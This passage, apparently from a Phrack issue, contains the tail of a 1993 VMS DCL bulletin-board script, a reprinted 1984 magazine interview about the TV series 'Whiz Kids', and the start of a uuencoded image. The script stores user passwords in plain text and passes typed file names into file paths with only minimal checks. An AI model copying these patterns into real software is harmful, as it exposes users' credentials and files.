write sys$output "U can't type files such as .ZIP .EXE .ARJ etc..." $ inquire file "File to type ? " $ if file .eqs. "" then goto f $ if file .eqs " " then goto f $ if file .eqs. "login.com" then goto F $ inquire page "do you want the file to be typed with or without page pause ? (A/B) " $ cls $ if page .eqs "a" then goto nopage $ if page .eqs. "b" then goto page $ goto 2 $ page: $ type [bbs]'file' /nopage $ inquire/nopunct tasto "Press [ENTER] to continue..." $ cls $ goto F $! $ nopage: $ type [bbs]'file' /page $ inquire/nopunct tasto " Press [ENTER] to continue..." $ cls $ goto F $! $ 3: $ cls $ write sys$output " " $ inquire dl "File to download ? " $ inquire protocol "Protocol ? (Z=Zmodem, K=Kermit) " $ if protocol .eqs. "z" then goto zmodem $ if protocol .eqs. "k" then goto kermit $ goto F $ kermit: $ if dl .eqs. "" then goto F $ if dl .eqs. "login.com" then goto F $ if dl .eqs. "bbs.com" then goto F $ mcr kermit send [bbs.files]'dl' $ exit $ goto F $! $ zmodem: $ !!!!! Put here your zmodem program download string, etc $! $ goto F $! $ 4: $ cls $ write sys$output " " $ out blink $ write sys$output " Thanks for your upload! " $ out normal $ out reverse $ write sys$output " Default transfer protocol is Kermit " $ out normal $ inquire ul "File to upload ? " $ if ul .eqs. "" then goto F $ if ul .eqs. "login.com" then goto F $ if ul .eqs. "bbs.com" then goto F $ mcr kermit rec [bbs.files]'ul' $ exit $ open/append [bbs.files]files.txt $ write [bbs.files]files.txt "File ''ul' sent by ''user' at ''start' on ''device' " $ close [bbs.files]files.txt $ inquire desc " Please type a short description for your file " $ open/append [bbs.files]files.txt $ write 'desc'' [bbs.files]files.txt $ write [bbs.files]files.txt "----------------------------------------------------------------------" $ close [bbs.files]files.txt $ goto F $! $ 5: $ goto mainmenu $! $ M: $ cls $ write sys$output " MailBox Menu " $ write sys$output " " $ write sys$output " " $ write sys$output " [S] Send a Message " $ write sys$output " [R] Read Messages in Your Mailbox " $ write sys$output " [C] Clear Your Mailbox " $ write sys$output " [D] Delete Your Mailbox " $ write sys$output " [M] Go Back To Main Menu " $ write sys$output " " $ write sys$output " " $ inquire mailmenu " (S,R,C,D,M)==> " $ if mailmenu .eqs. "S" then goto smail $ if mailmenu .eqs. "R" then goto rmail $ if mailmenu .eqs. "C" then goto cmbx $ if mailmenu .eqs. "D" then goto delmail $ if mailmenu .eqs. "M" then goto mainmenu $ if mailmenu .eqs. "" then goto M $ goto M $! $! $ delmail: $ write sys$output " W A R N I N G ! ! ! " $ write sys$output " " $ write sys$output " Deleting Your Personal Mailbox " $ write sys$output " Will Remove You From The Users File " $ write sys$output " " $ inquire del "Do You Want To Delete Your Mailbox ? (Y/N) " $ if del .eqs. "Y" then goto mbxdely $ if del .eqs. "N" then goto mbxdeln $ goto M $! $ mbxdely: $ goto dmbx $ goto M $! $ mbxdeln: $ cls $ write sys$output " " $ write sys$output " Mailbox not Deleted " $ wait 0:00:02 $ goto M $! $ I: $ cls $ write sys$output " We're sorry if this system isn't 100% working fine. " $ write sys$output " We keep on to work at it. If you find bugs and/or errors, " $ write sys$output " please send me an URGENT mail (P option at Main Menu) " $ write sys$output " Thanks." $ write sys$output " " $ write sys$output " Bbs Staff " $ wait 0:00:03 $ goto mainmenu $! $P: $ cls $ write sys$output " " $ define/user_mode sys$input sys$command $ mail sys$command !!!!!!!<-- your VMS account, where you can $! receive regular vms mail via the vms mail utility $ goto mainmenu $!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $ newusr: $! $! NEWUSR.COM VERSION 1.0 BETA $! $ on warning then goto ok $ on control_y then goto ok $ on error then goto ok $ on severe_error then goto ok $ set on $ in :== "inquire /nopunctuation" $ out :== "write sys$output" $! $ cls $ write sys$output " " $ out blink $ out " Welcome New User ! " $ out normal $ out " " $ out " " $! $ in usr "Username: " $ open /read mailfile [bbs]'usr'.mail /error=ok $ out " " $ out "This Username already Exists." $ out " " $ wait 0:00:02 $ exit $ ok: $ set term/noecho $ in pass "Password: " $ set term/echo $ open /write mailfile [bbs]'usr'.mail $ write [bbs]mailfile pass $ close [bbs]mailfile $ out " " $ out "User ''usr' Added To Users File." $ out " " $ wait 0:00:02 $ exit $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $ ! bsbbye, displays a ascii file and logs user out of the system $ bbsbye: $ cls $ type [bbs]goodbye.txt /nopage $ FINISH = F$CVTIME(,,"TIME") $ WRITE SYS$OUTPUT " " $ WRITE SYS$OUTPUT " " $ WRITE SYS$OUTPUT " " $ WRITE SYS$OUTPUT " " $ WRITE SYS$OUTPUT " " $ WRITE SYS$OUTPUT " " $ WRITE SYS$OUTPUT " " $ WRITE SYS$OUTPUT " S F E R R A B B S ( C ) 1 9 9 3 " $ WRITE SYS$OUTPUT " " $ WRITE SYS$OUTPUT " L O G O U T " $ WRITE SYS$OUTPUT " " $ WRITE SYS$OUTPUT " " $ WRITE SYS$OUTPUT " " $ WRITE SYS$OUTPUT " C A L L B A C K S O O N ! ! !" $ write sys$output " " $ write sys$output " " $ write sys$output " " $ write sys$output " " $ write sys$output " " $ open/append output_file [bbs]users.dat $ write output_file "User: ''user' disconnected from ''device' on ''finish'" $ write output_file "-----------------------------------------------------" $ close output_file $ exit $!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $ smail: $!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $! SENDMAIL.COM VERSION 1.0 BETA $! $! $! $ on error then goto nouser $ on severe_error then goto nouser $ in :== "inquire /nopunctuation" $ out :== "write sys$output" $! $ cls $ out " Write Your Message Below. End With a Dot (.) " $! $ pass="" $ in usr "From : " $ open /read checkpw [bbs]'usr'.mail /error=wronguspw $ set term/noecho $ in pw "Password: " $ set term/echo $ read checkpw pass $ if pass .nes. pw then goto wronguspw $ if pass .nes. "" then close checkpw $ in dest "To : " $ open /append mailfile [bbs]'dest'.mail /error=nouser $ in obj "Object: " $ write mailfile "From : ",usr $ write mailfile "To : ",dest $ write mailfile "Object : ",obj $ write mailfile " " $ write mailfile "Text :" $ write mailfile " " $ line=2 $ previous: $ line=line-1 $ if line .eq. 0 then line=1 $ again: $ in text "''line': " $ if text .eqs. "c" then goto previous $ if text .eqs. "." then goto endinput $ write mailfile text $ line=line+1 $ goto again $ endinput: $ write mailfile "------" $ close mailfile $ out " " $ out "Mail Sent." $ wait 0:00:02 $ exit $ nouser: $ out "The user does not exists, please check the name." $ out " " $ wait 0:00:02 $ exit $ wronguspw: $ out " " $ out "You have entered a wrong Username/Password." $ out " " $ wait 0:00:02 $ if pass .nes. "" then close checkpw $ exit $!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $ rmail: $!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $! $! $! READMAIL.COM VERSION 1.0 BETA $! $! $! $ on error then goto finished $ on severe_error then goto finished $ in :== "inquire /nopunctuation" $ out :== "write sys$output" $! $! $ out " " $ in usr "Username: " $ set term/noecho $ in pass "Password: " $ set term/echo $ open /read mailfile [bbs]'usr'.mail /error=wronguspw $ mails=0 $ read mailfile pw $ if pw .nes. pass then goto wronguspw $ again: $ read mailfile text /end=finished $ if text .eqs. "------" then gosub pause $ out text $ goto again $ finished: $ close mailfile $ if mails .eq. 0 then goto nomails $ out " " $ out "End of Mails." $ wait 0:00:02 $ exit $ nomails: $ out "You have no mails." $ out " " $ wait 0:00:02 $ exit $ pause: $ out " " $ in more "Press any key to read next mail, press X to exit." $ if more .eqs. "X" then goto exitmail $ text=CLC $ mails=mails+1 $ return $ wronguspw: $ out " " $ out "You have entered a wrong Username/Password." $ out " " $ close mailfile $ exit $ exitmail: $ close mailfile $ exit $!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $ cmbx: $!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $! $! CLEARMAIL.COM VERSION 1.0 BETA $! $! $! $ on error then goto mistake $ on severe_error then goto mistake $ in :== "inquire /nopunctuation" $ out :== "write sys$output" $! $ cls $! $ pass="" $ in usr "Username: " $ open /read mailfile [bbs]'usr'.mail /error=wronguspw $ set term/noecho $ in pass "Password: " $ set term/echo $ mails=0 $ read mailfile pw $ if pw .nes. pass then goto wronguspw $ close mailfile $ open /write newfile [bbs]usr.tmp /error=wronguspw $ write newfile pw $ close newfile $ delete [bbs]'usr'.mail;* $ rename [bbs]usr.tmp [bbs]'usr'.mail /nolog $ cls $ out " " $ out "Mailbox Cleared." $ wait 0:00:02 $ exit $ mistake: $ cls $ out " " $ out "An error has occurred, contact Sysop." $ out " " $ exit $ wronguspw: $ cls $ out " " $ out "You have entered a wrong Username/Password." $ out " " $ wait 0:00:02 $ if pass .nes. "" then close mailfile $ exit $!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $ Dmbx: $!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $! $! DELETEMBX.COM VERSION 1.0 BETA $! $! $! $ on error then goto nouser $ on severe_error then goto nouser $ in :== "inquire /nopunctuation" $ out :== "write sys$output" $ out " " $! $! $ in usr "Username: " $ open /read mailfile [bbs]'usr'.mail /error=nouser $ set term/noecho $ in pass "Password: " $ set term/echo $ read mailfile pw $ close mailfile $ if pw .eqs. pass then goto deleteit $ out " " $ out "Wrong Password." $ wait 0:00:02 $ exit $ deleteit: $ delete [bbs]'usr'.mail;* /nolog $ out " " $ out "Mailbox Deleted." $ out " " $ wait 0:00:02 $ exit $ nouser: $ out " " $ out "This Mailbox doesn't exists!" $ out " " $ wait 0:00:02 $!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $ fileslist $!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $ fileslist: subroutine $ cls $ type [bbs.files]files.txt $ write sys$output " " $ exit ==Phrack Magazine== Volume Five, Issue Forty-Five, File 17 of 28 **************************************************************************** [While scouring through the fire hazard I call a bedroom, I stumbled upon this piece of history. I don't know how many of you will remember this, or moreover, how many of you will appreciate it, but here it is anyway.] --------------------------------------------------------------------------- (From Video Games, No. 16, January 1984) Hollywood-Style Bits and Bytes Whiz Kids' Executive Producer Phil DeGuere Takes You Behind the Scenes of His Hit TV Series by Richard Goodwin "I want to overcome what appears to be peoples' innate fear of computers at an early age to that they won't have any fear nor will be particularly in awe of them," says Executive Producer Phil DeGuere of his new TV series "Whiz Kids." At the time he was speaking, it was January and CBS had just given him the go-ahead to prepare a pilot. After the pilot was delivered in April, the network gave him a series commitment to produce the successive episodes. It wasn't until this past June that "WarGames" opened and DeGuere, who wasn't overly thrilled with the summer smash, goes to great length to make people aware that there are no similarities. In fact, he says, the idea was hatched more like a year-and-a-half ago, before WarGames even went into production. DeGuere, a large, slightly rumpled appearing Californian, is one of Universal's most successful television producers. He has been with the giant studio for nearly a decade and has had a string of popular series including "Baa Baa Black Sheep" and the current hit, "Simon and Simon." A long time fan of science fiction, DeGuere feels the new series, now seen on Wednesday evenings is living up to the original meaning of science fiction. He's taking today's technology and expanding upon it in fictionalized settings. "The important thing is versilitude and not accuracy," he says while seated in his large office. "You should feel when watching it that it's the real thing. I think we've succeeded in that because consistently, computer professionals have enjoyed the pilot and even though they know better than anybody that there are impossible things being done in that pilot. It's not like having a Volkswagon fly...it's not that impossible." Computer fans will find many identifiable machines on the show with most of the major companies represented in one way or another. "I've got to differentiate between what are essentially props on the one hand and working gadgets on the other," DeGuere explains. "In terms of props, you're going to see things like Apples and Ataris. We have been using some Aquariuses from Mattel and if Coleco ever comes up with ADAM, I'm sure we'll use that too. "On the higher tech side, we'll have some of the hot portable computers like Gavilan and Compass, all of which basically are things people sit at. There may not be any systems functioning during the course of the show. "When it comes to real working gadgets, it appears that we have worked out an arrangement with Xerox to use what is probably the most sophisticated personal computer in existence, the Xerox 1100, which is such an expensive machine and was responsible for some super-high resolution graphics in the pilot. After some modifications to the machine it will be capable of generating some great graphic material." DeGuere shifts a bit in his chair, runs a hand through his tousled hair and adds, "We're into some robots. We're using one called RB5. They're pretty amazing machines. RB5 is like an R2D2. We're planning to incorporate it into some classroom situations." The computer whiz and focal point of the series centers around Richie, the "hacker" played by Matthew Laborteaux. He's surrounded by three friends with varying degrees of interest in computers but all love the adventures. There's Hamilton Parker (Todd Porter), the freshman class president; Jeremy (Jeffrey Jacquet), the resident jock and Alice (Andrea Elson) who wants to belong to the gang. Richie is also forced to deal with a younger sister (Melanie Gaffin) who wants to be in on the action but is either too scared or perhaps intimidated a bit by Richie. The youngsters go to a progressive California high school with a full complement of computers and an exasperated teacher who is always bested by Richie. When danger lurks, though, the kids turn to Farley (Max Gail, best remembered as Wojo on "Barney Miller"), the crime reporter for the local paper. Originally, the kids were teamed with a younger reporter, but CBS decided a more adult, experienced role model was needed to offset the youthful exuberance of the stars. Also representing the adult world is a cop named Quinn, played by A. Martinez. And to keep things interesting, the cool and dapper Quinn dislikes Farley, a Damon Runyeonesque-type of guy. As seen in the pilot, the adults do not appear to be the brightest of people and DeGuere explains it's done on purpose. The focus of the show is on the kids. We want them, the underdogs, to succeed. In order for that to happen the adults have to tune them out," he defends. The first story has Richie and the gang bringing down an overambitious vice-president of a mammoth conglomerate. They story, while amusing, raised the ire of critics by the cavalier actions of the kids. At a promotional meeting held early this summer, DeGuere defended his show with characteristic bluntness. "I insulted them personally and I insulted their family and I insulted their heritage, their future generations, their profession and just about anything else I could think up. The major attention being an attempt to get them off this idea that they have uncovered some horrible sin. I think we were very successful in doing that." DeGuere says his series won't show the kids breaking into computers and invading peoples' privacy. Rather, the repercussions of such actions will form the core of some segments. "We were responsible on those subjects from the very beginning," he points out. "There is something synergistic about a computer program. A computer program does things that a computer designer does not always intend. Even if you sat down from scratch. If the armed forces came to you and said, 'Here's all the money and time in the world. You're going to start from scratch with the hardware and software. Build us a network that is totally secure.' I don't think it could be done. That's one of the things that's so fascinating about computers--the program ends up being more than the sum of its parts. Even though, in most states, there are statutes which state that accessing another computer system without permission is against the law." "Whiz Kids" will benefit from the experience of two consultants, adding a level of technical accuracy other films and television programs have missed. David Gunn worked on the pilot and was signed on by DeGuere for the duration of the series. "He's very knowledgeable in the field of microcomputers and I'm fairly knowledgeable myself," he says. "We have a technical advisor on the show who is an investigator for the District Attorney's office and is a peace officer who has specialized in computer crimes for years. So, when it comes to areas of legality on the one hand and technical accuracy on the other, we go to him. This is a very tiny portion of what's going on in the series. I personally would prefer the technological aspects to be handled as accurately as possible and I would rather have it believable than sound stupid. "In many cases we will have characters spewing a lot of jargon and it happens to be true but it's not intended to be something the audience has to follow. It's like medical shows where the doctors are talking about this and that," DeGuere explains. The series will be a fast-paced mixture of adventure and intrigue that usually has the kids stumbling upon a problem and then acting quickly to stop the crime or criminals without getting caught or killed. Added to the stories will be glimpses of their home lives and interrelationships. DeGuere repeats his hope that the show catches on and finds an audience so he can have the kids grow and develop, something fairly unique to series television. "If the show clicks, we have it cast in a way that allows us to follow them right on through college," he optimistically offers. When not in school, the kids will be clustered around Richie's home computer and trying to crack cases. Richie has built a complicated system that would be any hacker's dream including a voice activated system named RALF complete with camera and robot appendages (This way Richie can eat a sandwich while using both hands to manipulate the keyboard). DeGuere offers some upcoming storylines as examples of the broad mixture of the series. "Richie has a friend who he met at the computer store, who happens to be a data processing manager for a local chemical company. As it happens, they have just installed a new computer security program and he thinks the best way to test the program is to have a hacker like Richie try and break it. He hires Richie who breaks into the system and discovers a Trojan Horse buried in the computer. There's a program running inside the computer, developed by a bunch of unscrupulous people working at the company. These people are in the process of doing chemical biological warfare of their own, for sale to unfriendly third world nations. "Needless to say, the project manager quickly disappears and Richie is the only one who knows he's in trouble. He doesn't know why but he knows his friend is gone. The kids unravel the mystery." The show will also feature a guest appearance by "Simon and Simon's" Jameson Parker in a bid by DeGuere to help link together the two CBS series. Later in the season when the Simons need some computer expertise, they will approach Richie. "Or," DeGuere offers, "There is a computer used in the San Fernando Valley linking all the policemen to the department's computer. It's been the subject of a lot of articles because of cost overruns. Our story suggests that a clever criminal can figure out how to emulate one of the Mobile Data Terminals or the host computer. These are a bunch of bank robbers who figure out hat with come high tech stuff, they need only 15 minutes to get into the banks, get the money and leave. All you have to is make sure all the local police units in the area that could respond to the call are unavoidably detained for 15 minutes. "That's what they're doing at the start of the story. Everyone thinks it's a matter of computer error until Richie says, 'There's no such thing as computer error. It's people error.' They go on to prove that by stumbling on to the criminals." During the conversation, held long before the series finally premiered on October 5, DeGuere points out things are still developing. "We are, at the moment, waiting to see how several different approaches to storytelling turn out on film. Right now, I'm just seeing the rough cut of the first episode after the pilot. So I'd say we're in the gestation period right now. We are not one hundred percent sure of what mutations are going to be appropriate for this particular child. None of the things are quite formulated yet. "We're trying to inject and build into the scripts as many solid entertainment values as we can. We want to have characters you care about, relationships that feel real and a general sense of fun rather than try and throw everything about computers into it. We're trying to make it high tech on a lot of different levels, not just computers. "What happens on a new show, based on past experience, is that you don't know what is really working. I don't know until I get a chance to go home on Wednesday night and watch the evening news, watch the promos. I like to see how it leads into the movie and by that time, I will have begun to have an impression of what we're doing right and what we're doing wrong. Most series hit their peak, in terms of quality, in the middle of their second year. It's true of "Simon and Simon" and it's true of almost every other show I've worked on." The show was originally scheduled to air on Saturday nights but over the summer CBS switched it to Wednesday explaining that it would be a better opportunity to attract the youthful audience a show like "Whiz Kids" needs as a base. There are more TV sets in use on a Wednesday and the competition is diffuse with ABC offering "The Fall Guy" and NBC serving up more "Real People." This gives the show a better chance than if it was put up against "Different Strokes," "Silver Spoons" and "T.J. Hooker." "My personal feeling is that the show will be given a reasonable chance to succeed. It will probably mean two or three weeks after the World Series and if, by then, it has not established an audience, I do not anticipate it will be moved around--I don't know where they could move it to, frankly." As a result of researching the series, DeGuere who owns an Apple at home and has an office automation system in place, feels that he is fed up with computers. He complains of not being able to find the interest in running programs on his personal computer and has spent weeks getting the office system to work properly. Between that, researching the series, watching the critics nitpick "WarGames" apart and the press reporting every move made by the nation's hackers (most notably the 414 gang) he's fed up. "People are being bombarded about computers everywhere they turn. They take five steps and somewhere you'll be hit by the subject. Consequently, there may be an overkill factor involved. The best of all possible ways our series can benefit from "WarGames" is if a large number of our potential audience think that "WarGames" was a movie they might have wanted to see if they wanted to go to the movies." Fact or fiction, reality or overkill, Phil DeGuere is hoping that his series, co-created with producer Robert Shayne, will find a place in the prime-time sweepstakes. The idea is certainly unique and he is fortunate enough to have had the show in development when the rest of the world was just beginning to understand the important impact computers are having on our lives. Now, the question remains, do people care enough to tune in once a week and watch a group of students battle for truth, justice and the American Way using microchips, floppy disks and modems instead of guns, badges and sirens! -------------------------------------------------------------------------- begin 644 whiz.jpg M_]C_[0"3061O8F5?4&AO=&]S:&]P,BXU.@!D````9```.$))30/M```````0 M`&0````!``$`9`````$``3A"24T#\P``````!P``````````.$))30/T```` M```2`#4````!`"T````&````````.$))30/W```````<``#_____________ M________________`^@``/_N``Y!9&]B90!D@`````#_VP!#``0"`P,#`@,# M`P0%!`0$!0<&!04%!PH*"`8("@H-#0P,#`P-#A`0#PX/#PT0$1$1$A,5%144 M$A45%145%145%17_P``+"`$1`9`!`1$`_\0`T@````8#`0$!```````````` M!`4&!P,"`0`("0H+$``!`P($`P4$!`H!#@$#`&L!$0(#!`4`(3$2!@=!"!-1 M(F%Q@10)D:$R%?"Q0B,*P=$6X?%28C,D%W)#-!B"DADE1%-C)G,U5">B9+*# MDZ-TA)3"TC9%LT:DM%;#TU4H&N+RX_/$U.3T976%E:6UQ=7E]69VAI:FML;6 MYO8W1U=G=X>7I[?'U^?W.$A8:'B(F*BXR-CH^"DY25EI>8F9J;G)V>GY*CI* M6FIZBIJJNLK:ZOK_W0`$`#+_V@`(`0$``#\`X[N\3HZ]S4("#IB!2`"5]IQ' M,Y3^O%.JXUP.AQ@.(/NQ)'*\-R*8GCJ969AW3$\5RJ&E'=.F)X[D!D]@\"F) M65],6;2#C(DI)&/\R%<@?QXC=$'%Q;(T^&>,&)P14UZ'3$+XWAZ%I]J98J6. M3KB+//V?1B-%'F\,;(T;DZ8J[3 MKBI=T!]F,D(/7&L"N3JF-&,)D`<9VC+%FMTQ)FBZ) MC!^T=N+MT/1,985.0_CB^IQDE6C/3&8QN!'UXP5!0KC"..-0`J?JQ;I`(7/IC7!P;GF5TQ4$C'_]#F7B2VTM'Q_P#!U]0:6(/9WDFP MN#&^X8,N.8K956V"EMMRI9:2B:X0/,!CDE74DG4X;N:)PE+PT\LDK&,!<][D#0,R3A35W+KC MFEIF5$U@N`C)(W%K@6D=#C+9Y4!#G8F;6U#/ROXXEBK:A[N,.&B?5C(; ME[=,9D"_9]^(SED>N,$9JF8.,E-J:XJ,G@XL'`DC/&"F9&*=5&N-S48D&28L M%08NT_9#O#&0,E&N-+?3%D'3ZL9"HF,L"XSIT5<5<"OZL9]VGAC0TEPQ9Z:! M<9:S<=S3X8NBDG&=A\HZ],1S-SS*8O-3%E!'/_2]E2`D8`R709G$G&UWNP9>&&IXPMD3K'.\,M[_+]J(HX#V+ MAM7V](PG4X57(_AB:^;O,GA.SPMI7%EUG>2V1E+&#W9`T+W>4'P0XYYXTXOI[A>*J MIL]%]U4,FP2QQ(Z0'55(*$G7:@.$OQ/=Z&LAABHZ$4X82Y\CG;GR$ZKX#V8) MVN`9KETSPH*8\#S48=4?>E/4AC58P1OB>[J!H0/#7`&^0VV%D'W=5S5=.X-< M8YH^[?&[J,B0?:#@NJ"#*\M*M<5!52G[<12$N<7YK^4<9>"'`^BC%?RM=>N- M+UR*ZXLU^W+4:K@0WS-5IQNTY$Y8C.J#&`"AR7&[2/%?Q8T-\R'KC2TJB(#H MN-VDC3&[2=1KT&-+'=/7/%Q M'Y44C%XMH<6GPQ7[+CDK1B*1PS.9`PH>(K::;@2Q5;@@JGR$>['_TD%VG+3- M+QLZHIQ1/:D#>Y>?SJ^N>F(6\%UE+P5<:N>S6ZH=6Q->)HY?-$`%R!&OL.&= M@M[W5TT>TJ"?*.F.G>QU2O;RON49F>Q:UQ+$\K"@_'UP[$(V1/#VLXRT@-#'$^%Q,LB$CIHNF&QX^X1BBX6N-4V&B#F1[?S;@ONPTU!P[4S M6B2M="YM-$=SYB-&C[6WQUQ+RUXG/#G%M)6V:#XNY,Z9$SN:1I(W!C$+QEQ-4WDQTM,U\U-2 M. M=#IF@.`M4XRP1N;&UC&E%;HOMP')"Y:#$O>K$&[B@5&XGMXI)F/9.US7D(QX M>`T'U7IB*YTSZ2K?3DKM^TARS]=#[1B!PS`/@F,#(I]>-(&1'CC3EH"$7$D# M]KP#H<#',)`/XL1F(H=H/MQ/26VHGF>>)&.`.F73%G*N?7&6B0N5@R7%@)'DE,21LE<"`#EC) MIYB24/H/#&/AYB$ZKF,8,,J@'+:.O3%3&\$H[%F4\FU=R@=,6[MS54G$4D66 MY=3BCH]Q:&ZD@8=WM"6=EIY6\NXF!'.@)?T!<0"?QX__TP?-^O@/ÐZVT0 M5$5"V&03C[;]S=--!X8)N$+MP7262:EN%%,]T@>0BEH7IJ/'"/X9X7AN'$-5 M\*6.C+GN8SJT=`!GTK7!@DG<[81U7"XEIYQ&]FR//4^.$;>X) M(JC8VC@>T9A=,(/B_@^2N;5W"=D=/&F<,;UW@=,'E;7\-VGE3;K`L$53<*9M M,70_WMSUR.2DJ<\M-<;<$ M0XV#O3$X,7:"KO#VG&U(\L;L@HZ8C(**`@PM>(^%K7PY M331NJV/[M1)5N&3W@+M8!T]?QXAX;X=K;]:OC[@YMIL$?F#0C9:AH.K0>GB3 M[L)3CFGI*6Y&*W0=U`UH[MSPI>/%3K@MX:NPME>]U1`VJA>US7,=JU='#U!S MQ(R[24U:UPVRL!W-$@!#E\<'=HIW7.WR5E*TD,<=[&YF,?LQ2KH7-C>3FT:G M!9%0RS2.[MBM8"J#$,M,YC4^O`1[D<6G/Q.+,1P1<3Q@!I0KEBT#?-H2N@P9 MTUOK)G,;#1SR.(R:V-Q)^K!K'PO?XZ;XF:U5L4#?M2OA>&@=,R,":#A'B*MI M_BJ.TU4].NWO61.+7'P7!W:.5?'M>Y\E+P_5>4H=P#?QG!O5Y"<=U-*)1;:3;(T%CI9@"%\.,:!]PCK M:>CA#MH9("YQ(UR&F#'BGLYW*TBG=->J1XD?M<=I:&_2<\(GC7E=4V"'>ZM@ MJP"1^:(_;A(QVAWWC0Q%A5TK&GWNP\_;5@^%XYP5,V_T< M,ISH^]:.&HAX=#)'Q5]-13%\B`RSYL:.B]3AMJSBRLH;AQ?+>G_`U-)&R*&G MI"`[OR=HW2$$AR!20F0PRM?)--6S32/,CWN+G2*27$]5.>>(I-P`W.S\,;!L M5IE#G,Z@%"<:][F[F1N*)J.HQ2.1S5`T=J/'$O?_`)H,S+0<@<1.(:$V@JGABL:[3Z8PQ,P?'(XE`&6W5,_;A5\NK!2WBH$-1*(W.T:X*3XD8= M*@Y/61T;'UD$@$GD9W;SYBX>5V&QYL\`UO!U]-(KYX7,#FREIZ],(\LVY$>W M!OPW>KC:N_@MLSJ@\<">*.):FMK*6,/[RGI'%T4+LXP[KE MU]2IC?H<=;\FN+*+B:*"3X.DI' MAH1H(+O8/#"XX_C$_`]SIV.A#7PN&YS5`48`.-CE=41[5\=PPK>W-.XWGA6E=EW5&X[?51C_U5M8Z*.IXSXL M"INJ(6.)"C*,845-9TC,9+2URC+%N'>'(Z&OFJ&1,&\'<6KG[<*FGH&R4T6_ M(JNT8FG;%3Q&+;N!S).N">LIPZK$@!R'V3X8XT[:-S8.8#+9;I'PM#S4U4+2 M0TU!``=ZHT``^W#,5-3)/4U39YW[9Y`Z0N)=N(ZGQ.(9Y8=H9`UX:/M%QS?Z MITP'D51D,8Z<^-SF M`$-.?CB/:@()QL2!Q0J,4(0^PXG@"R-!R!_'AV>3%/.VH9'31MDD=M(`3]4.;T"82P4>TC%`I*DX%U%(8*6"H0#)F&] M0/'%`WRGQU]V,)B2!Q;,QX^T"#A0W^L$'$]-=*0!@J8XGR,:$!<6@.^DKAT9 M*NYGA&J:)-L,,)>P`9YC#-U5TKI)'E\CB2N1Z8`J9)U)4N.!K`0T)@73-_-O M?^4F#3AR@^.K*>E>]K!)(&F1WY*XZ#Y><+1\+UE-+054=:Y`Y&YD_1A[;?7U M5PX8V5,#*=TGY!77WX/;?3`6NF8)`"QH"[=,#[9$TJ1*OAEBEPA[R2(!Y/FU M3!I3HUC&J2@5!]>`\&TUDS@\N"A#X#$?$8[RW2!LA:'C$=BA;#;V-'>`@=#E MB&ZQQ.DB;(^8$*;)0_3PSP M@.W7.UW,RVP?[F@;DNBDX__6<2S.%)Q'?W002%\LS'.<\(TG8!Y2F%%05DCX MU?"`G@<&5JJC5.EB,!81U4(1[L'D43A3LA.*E`3TQK? MQZ8RT9H=#B1CW1H&JBKZ'%MBF02-1Q'7)#@.UA!"!5RQEY`=F/9BT.XSQB-J MN4(WQ.'CY&7VQU=Q;;KQ(VTUS-OPLS_L/]LC2 MK')JA.`G'D5-6R5$4,@^(@+07-.B]%&.<.T;3_!\44E"Z0R/CA+W%513EI[, M-XX`@8J0=R^N!$\XDCIXQHP(3[3@2#;Y*8_UQDC$VKF'!<_H&*U43&PPOC>U MSY07.8/R`N0)\&XYG\,TU.U]101;-JE^W3 M#?TX/?-P8ANY`%]<#:-H[ES3Z9X4G!5KK+A-$*>%[V;PTR-:2&*?3'6O*_@J M&VQ44IDWO:QH<7MRS&%_>J:&.F8=P"(F0RP,IG!T,;6N:NT$KUP,H04'F`7) M>N+5+7.FA#2"5&@0^W":YAF&AN_:Q MX9BN;FVVQUL]*'`&:5\<;D\0S/Z%PL+#SZX`O]N:67>*FD+=SX*AI:]I7,>! M]RX6G"/'?"MW,<%NO%%),\#;$7AKW>P.0DX.*Y^ZKC61J$$G!1?&/DBVEK7@ MI]&$W1TC'<5QR.`6+1.F.9.V=.9NN`QIF!Y4*$R0Z8;7M/\//XFY+<36J%>^9#\5$"=71'7':6%=JJF(T)=EKC#AGKUQDM6,+C0%!!]V#7A7 MAF^\05K*6R4$]9([3NVY#VG08=_@SLR<67.,3WVMI+4"%$3?SLA]J(!].'*L M'9FX(I;5\-<:BMK*QV9J@\,#?1K$(3VJ<+*S@3!UQG M9)['=/N:NIFPSTZ/F+05`>`0"3X8+75S*-\#J9P#HMKVD#1XP!N56^MK)*B4 MC<\J2`@P_P#V>5JN6$>[S]Q-+'IHU?XX"\UZ%L/"]QD(`.Z+F=:IX+/+<;72[MLU1%W;)@PYH'%=@=X@'#(\[7 MNMW#U))4W.0.;+5.D=,Y[E\Q>YQ&:_RQSK7RA]2]PR"HF*V]TK*N-\"N>"K0 M`IPJ*^[UE3\/(^4M9(X-VJA@>OVFZ$?5AQ.5':+XJX3N<=JXH>Z_6B,]WWDA M'Q,+/%K_`,K+H[Z<=)6KC?AWBOAN*[\/53:N"5&NV%)(B>CVZM.!'#KFR7;? 